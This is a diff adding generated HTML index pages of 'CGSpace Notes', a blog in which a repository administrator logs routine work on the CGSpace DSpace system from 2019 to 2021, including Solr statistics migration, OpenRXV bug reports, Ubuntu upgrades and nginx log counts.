+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link active" href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-02/">February, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-02-01T10:13:54+02:00">Mon Feb 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-02-01">2021-02-01</h2>
+<ul>
+<li>Abenet said that CIP found more duplicate records in their export from AReS
+<ul>
+<li>I re-opened <a href="https://github.com/ilri/OpenRXV/issues/67">the issue</a> on OpenRXV where we had previously noticed this</li>
+<li>The shared link where the duplicates are is here: <a href="https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6">https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6</a></li>
+</ul>
+</li>
+<li>I had a call with CodeObia to discuss the work on OpenRXV</li>
+<li>Check the results of the AReS harvesting from last night:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100875,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-01/">January, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-01-03T10:13:54+02:00">Sun Jan 03, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-01-03">2021-01-03</h2>
+<ul>
+<li>Peter notified me that some filters on AReS were broken again
+<ul>
+<li>It&rsquo;s the same issue with the field names getting <code>.keyword</code> appended to the end that I already <a href="https://github.com/ilri/OpenRXV/issues/66">filed an issue on OpenRXV about last month</a></li>
+<li>I fixed the broken filters (careful to not edit any others, lest they break too!)</li>
+</ul>
+</li>
+<li>Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV
+<ul>
+<li>The start page had been &ldquo;1&rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API</li>
+<li>I adjusted it to default to 0 and added a note to the admin screen</li>
+<li>I realized that this issue was actually causing the first page of 100 statistics to be missing&hellip;</li>
+<li>For example, <a href="https://cgspace.cgiar.org/handle/10568/66839">this item</a> has 51 views on CGSpace, but 0 on AReS</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-12/">December, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-12-01T11:32:54+02:00">Tue Dec 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-12-01">2020-12-01</h2>
+<ul>
+<li>Atmire responded about the issue with duplicate data in our Solr statistics
+<ul>
+<li>They noticed that some records in the statistics-2015 core haven&rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&rsquo;t migrated any of the records yet</li>
+<li>That&rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the <code>cua_version</code> field</li>
+<li>I started processing those (about 411,000 records):</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/">CGSpace DSpace 6 Upgrade</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-11-15T13:27:35+02:00">Sun Nov 15, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Notes about the DSpace 6 upgrade on CGSpace in 2020-11.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-11/">November, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-11-01T13:11:54+02:00">Sun Nov 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-11-01">2020-11-01</h2>
+<ul>
+<li>Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test
+<ul>
+<li>So far we&rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&hellip; wow.</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-10/">October, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-10-06T16:55:54+03:00">Tue Oct 06, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-10-06">2020-10-06</h2>
+<ul>
+<li>Add tests for the new <code>/items</code> POST handlers to the DSpace 6.x branch of my <a href="https://github.com/ilri/dspace-statistics-api/tree/v6_x">dspace-statistics-api</a>
+<ul>
+<li>It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available</li>
+<li>Tag and release version 1.3.0 on GitHub: <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0">https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0</a></li>
+</ul>
+</li>
+<li>Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump
+<ul>
+<li>During the FlywayDB migration I got an error:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-09/">September, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-09-02T15:35:54+03:00">Wed Sep 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-09-02">2020-09-02</h2>
+<ul>
+<li>Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS</li>
+<li>The AReS Explorer hasn&rsquo;t updated its index since 2020-08-22 when I last forced it
+<ul>
+<li>I restarted it again now and told Moayad that the automatic indexing isn&rsquo;t working</li>
+</ul>
+</li>
+<li>Add <code>Alliance of Bioversity International and CIAT</code> to affiliations on CGSpace</li>
+<li>Abenet told me that the general search text on AReS doesn&rsquo;t get reset when you use the &ldquo;Reset Filters&rdquo; button
+<ul>
+<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/39">https://github.com/ilri/OpenRXV/issues/39</a></li>
+</ul>
+</li>
+<li>I filed an issue on OpenRXV to make some minor edits to the admin UI: <a href="https://github.com/ilri/OpenRXV/issues/40">https://github.com/ilri/OpenRXV/issues/40</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-08/">August, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-08-02T15:35:54+03:00">Sun Aug 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-08-02">2020-08-02</h2>
+<ul>
+<li>I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their <code>cg.coverage.country</code> text values
+<ul>
+<li>It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&rsquo;s preferred &ldquo;display&rdquo; country names)</li>
+<li>It implements a &ldquo;force&rdquo; mode too that will clear existing country codes and re-tag everything</li>
+<li>It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&hellip;</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-07/">July, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-07-01T10:53:54+03:00">Wed Jul 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-07-01">2020-07-01</h2>
+<ul>
+<li>A few users noticed that CGSpace wasn&rsquo;t loading items today, item pages seem blank
+<ul>
+<li>I looked at the PostgreSQL locks but they don&rsquo;t seem unusual</li>
+<li>I guess this is the same &ldquo;blank item page&rdquo; issue that we had a few times in 2019 that we never solved</li>
+<li>I restarted Tomcat and PostgreSQL and the issue was gone</li>
+</ul>
+</li>
+<li>Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the <code>5_x-prod</code> branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-06/">June, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-06-01T13:55:39+03:00">Mon Jun 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-06-01">2020-06-01</h2>
+<ul>
+<li>I tried to run the <code>AtomicStatisticsUpdateCLI</code> CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday
+<ul>
+<li>I sent Atmire the dspace.log from today and told them to log into the server to debug the process</li>
+</ul>
+</li>
+<li>In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working</li>
+<li>I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/3/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/5/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/page/5/index.html b/docs/page/5/index.html
new file mode 100644
index 000000000..bac4d20f8
--- /dev/null
+++ b/docs/page/5/index.html
@@ -0,0 +1,492 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link active" href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-05/">May, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-05-02T09:52:04+03:00">Sat May 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-05-02">2020-05-02</h2>
+<ul>
+<li>Peter said that CTA is having problems submitting an item to CGSpace
+<ul>
+<li>Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &lsquo;idle in transaction&rsquo; and &lsquo;waiting for lock&rsquo; state are increasing again</li>
+<li>I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-04/">April, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-04-02T10:53:24+03:00">Thu Apr 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-04-02">2020-04-02</h2>
+<ul>
+<li>Maria asked me to update Charles Staver&rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it
+<ul>
+<li>I updated the fifty-eight existing items on CGSpace</li>
+</ul>
+</li>
+<li>Looking into the items Udana had asked about last week that were missing Altmetric donuts:
+<ul>
+<li><a href="https://hdl.handle.net/10568/103225">The first</a> is still missing its DOI, so I added it and <a href="https://twitter.com/mralanorth/status/1245632619661766657">tweeted its handle</a> (after a few hours there was a donut with score 222)</li>
+<li><a href="https://hdl.handle.net/10568/106899">The second item</a> now has a donut with score 2 since I <a href="https://twitter.com/mralanorth/status/1243158045540134913">tweeted its handle</a> last week</li>
+<li><a href="https://hdl.handle.net/10568/107258">The third item</a> now has a donut with score 1 since I <a href="https://twitter.com/mralanorth/status/1243158786392625153">tweeted it</a> last week</li>
+</ul>
+</li>
+<li>On the same note, the <a href="https://hdl.handle.net/10568/106573">one item</a> Abenet pointed out last week now has a donut with score of 104 after I <a href="https://twitter.com/mralanorth/status/1243163710241345536">tweeted it</a> last week</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-03/">March, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-03-02T12:31:30+02:00">Mon Mar 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-03-02">2020-03-02</h2>
+<ul>
+<li>Update <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> for DSpace 6+ UUIDs
+<ul>
+<li>Tag version 1.2.0 on GitHub</li>
+</ul>
+</li>
+<li>Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased <a href="https://github.com/DSpace/DSpace/commit/184f2b2153479045fba6239342c63e7f8564b8b6#diff-0350ce2e13b28d5d61252b7a8f50a059">SolrUpgradePre6xStatistics.java</a>
+<ul>
+<li>You need to download this into the DSpace 6.x source and compile it</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-02/">February, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-02-02T11:56:30+02:00">Sun Feb 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-02-02">2020-02-02</h2>
+<ul>
+<li>Continue working on porting CGSpace&rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday
+<ul>
+<li>Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database</li>
+<li>I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks</li>
+<li>Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff</li>
+<li>The code finally builds and runs with a fresh install</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-01/">January, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-01-06T10:48:30+02:00">Mon Jan 06, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-01-06">2020-01-06</h2>
+<ul>
+<li>Open <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">a ticket</a> with Atmire to request a quote for the upgrade to DSpace 6</li>
+<li>Last week Altmetric responded about the <a href="https://hdl.handle.net/10568/97087">item</a> that had a lower score than than its DOI
+<ul>
+<li>The score is now linked to the DOI</li>
+<li>Another <a href="https://hdl.handle.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li>
+<li>Another <a href="https://hdl.handle.net/10568/81236">item</a> that had the same problem in 2019 has also been fixed</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-01-07">2020-01-07</h2>
+<ul>
+<li>Peter Ballantyne highlighted one more WLE <a href="https://hdl.handle.net/10568/101286">item</a> that is missing the Altmetric score that its DOI has
+<ul>
+<li>The DOI has a score of 259, but the Handle has no score at all</li>
+<li>I <a href="https://twitter.com/mralanorth/status/1214471427157626881">tweeted</a> the CGSpace repository link</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-12/">December, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-12-01T11:22:30+02:00">Sun Dec 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-12-01">2019-12-01</h2>
+<ul>
+<li>Upgrade CGSpace (linode18) to Ubuntu 18.04:
+<ul>
+<li>Check any packages that have residual configs and purge them:</li>
+<li><!-- raw HTML omitted --># dpkg -l | grep -E &lsquo;^rc&rsquo; | awk &lsquo;{print $2}&rsquo; | xargs dpkg -P<!-- raw HTML omitted --></li>
+<li>Make sure all packages are up to date and the package manager is up to date, then reboot:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># apt update &amp;&amp; apt full-upgrade
+# apt-get autoremove &amp;&amp; apt-get autoclean
+# dpkg -C
+# reboot
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-11/">November, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-11-04T12:20:30+02:00">Mon Nov 04, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-11-04">2019-11-04</h2>
+<ul>
+<li>Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics
+<ul>
+<li>I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+1277694
+</code></pre><ul>
+<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
+<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
+106781
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-10/">October, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-10-01T13:20:51+03:00">Tue Oct 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc.
+  <a href='https://alanorth.github.io/cgspace-notes/2019-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-09/">September, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-09-01T10:17:51+03:00">Sun Sep 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-09-01">2019-09-01</h2>
+<ul>
+<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
+<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
